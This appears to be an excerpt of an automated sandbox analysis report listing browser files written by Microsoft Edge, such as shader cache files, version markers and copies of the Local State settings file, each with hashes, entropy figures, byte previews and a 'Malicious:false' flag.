                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:LsNlEWe1:Ls3EB
                                                                                                                                                                                                                                                                                MD5:1EE8CF394517156E9886AF7446A6AFB7
                                                                                                                                                                                                                                                                                SHA1:4370F8F5AFF812DE48802EB44422CD4F0CD0D71A
                                                                                                                                                                                                                                                                                SHA-256:F974F3CC8D5061B82E63A07CB7164212AC530A0C5D9DBB31BF2557244362D532
                                                                                                                                                                                                                                                                                SHA-512:B2838E067F0F14B559D6CDFD5286E382158AFC5D9247BD1BC83FA3C621D8E3A0AFB383D336CCFF0D4E770473580C649F6B650AB554DB6E0D765F3D4E1783ECE5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.........................................N..s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:LsNlC6lt:Ls3COt
                                                                                                                                                                                                                                                                                MD5:8EF6DB4F953A33D8C6B90F740AC9EBF8
                                                                                                                                                                                                                                                                                SHA1:ADDD054B46139AB5DFFCA8B63602C3D4E60BC8FD
                                                                                                                                                                                                                                                                                SHA-256:39458721A8AFFEE57307F7E47663BF2B676F813EDB8BCA028B210E6556D4D895
                                                                                                                                                                                                                                                                                SHA-512:07F017ADB725972883F6774DC356908991B3D439CA85FF73F8518E2191ED8B93675A2D85874E7ECB455900E043DC5BF6F77203ED5B8791824B50F6628FA1D363
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................X. .s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                Entropy (8bit):5.7944174570897875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfxHQBYx5ih/cI9URLl8Roto+MFVvlwhse4IbONIeTC6XQS0qGqk+Z4uj+rE:akJHQveiRUxhc6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                MD5:5ED639CBFBC33F103D13E54A5810F343
                                                                                                                                                                                                                                                                                SHA1:C48B4CFA4D7D63FCC2850E774572C1EEEDF1E37B
                                                                                                                                                                                                                                                                                SHA-256:9FB574A97B335A5F220F659B6630F45CA132A1A580AF8A71D38678C7D8F768EE
                                                                                                                                                                                                                                                                                SHA-512:2AC40645901B44B002CA629B2809C26F4105E4EE43602702FF56D536F5B12E35BE8D56F8F36D063B45B8E7FC828FAB87C4B79DC06B4CBCFDA6B80ACD5997F07C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACfJtKmBjOatQCTdGyHFgDW8nDJ1h65xGLuMZaXVuWXwQAAAAA

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF21e8a.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                Entropy (8bit):5.7944174570897875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfxHQBYx5ih/cI9URLl8Roto+MFVvlwhse4IbONIeTC6XQS0qGqk+Z4uj+rE:akJHQveiRUxhc6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                MD5:5ED639CBFBC33F103D13E54A5810F343
                                                                                                                                                                                                                                                                                SHA1:C48B4CFA4D7D63FCC2850E774572C1EEEDF1E37B
                                                                                                                                                                                                                                                                                SHA-256:9FB574A97B335A5F220F659B6630F45CA132A1A580AF8A71D38678C7D8F768EE
                                                                                                                                                                                                                                                                                SHA-512:2AC40645901B44B002CA629B2809C26F4105E4EE43602702FF56D536F5B12E35BE8D56F8F36D063B45B8E7FC828FAB87C4B79DC06B4CBCFDA6B80ACD5997F07C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACfJtKmBjOatQCTdGyHFgDW8nDJ1h65xGLuMZaXVuWXwQAAAAA

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF21e9a.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                Entropy (8bit):5.7944174570897875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfxHQBYx5ih/cI9URLl8Roto+MFVvlwhse4IbONIeTC6XQS0qGqk+Z4uj+rE:akJHQveiRUxhc6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                MD5:5ED639CBFBC33F103D13E54A5810F343
                                                                                                                                                                                                                                                                                SHA1:C48B4CFA4D7D63FCC2850E774572C1EEEDF1E37B
                                                                                                                                                                                                                                                                                SHA-256:9FB574A97B335A5F220F659B6630F45CA132A1A580AF8A71D38678C7D8F768EE
                                                                                                                                                                                                                                                                                SHA-512:2AC40645901B44B002CA629B2809C26F4105E4EE43602702FF56D536F5B12E35BE8D56F8F36D063B45B8E7FC828FAB87C4B79DC06B4CBCFDA6B80ACD5997F07C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACfJtKmBjOatQCTdGyHFgDW8nDJ1h65xGLuMZaXVuWXwQAAAAA

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF220ec.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                Entropy (8bit):5.7944174570897875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfxHQBYx5ih/cI9URLl8Roto+MFVvlwhse4IbONIeTC6XQS0qGqk+Z4uj+rE:akJHQveiRUxhc6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                MD5:5ED639CBFBC33F103D13E54A5810F343
                                                                                                                                                                                                                                                                                SHA1:C48B4CFA4D7D63FCC2850E774572C1EEEDF1E37B
                                                                                                                                                                                                                                                                                SHA-256:9FB574A97B335A5F220F659B6630F45CA132A1A580AF8A71D38678C7D8F768EE
                                                                                                                                                                                                                                                                                SHA-512:2AC40645901B44B002CA629B2809C26F4105E4EE43602702FF56D536F5B12E35BE8D56F8F36D063B45B8E7FC828FAB87C4B79DC06B4CBCFDA6B80ACD5997F07C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACfJtKmBjOatQCTdGyHFgDW8nDJ1h65xGLuMZaXVuWXwQAAAAA

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF22149.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                Entropy (8bit):5.7944174570897875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfxHQBYx5ih/cI9URLl8Roto+MFVvlwhse4IbONIeTC6XQS0qGqk+Z4uj+rE:akJHQveiRUxhc6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                MD5:5ED639CBFBC33F103D13E54A5810F343
                                                                                                                                                                                                                                                                                SHA1:C48B4CFA4D7D63FCC2850E774572C1EEEDF1E37B
                                                                                                                                                                                                                                                                                SHA-256:9FB574A97B335A5F220F659B6630F45CA132A1A580AF8A71D38678C7D8F768EE
                                                                                                                                                                                                                                                                                SHA-512:2AC40645901B44B002CA629B2809C26F4105E4EE43602702FF56D536F5B12E35BE8D56F8F36D063B45B8E7FC828FAB87C4B79DC06B4CBCFDA6B80ACD5997F07C
                                                                                                                                                                                                                                                                                Malicious:false
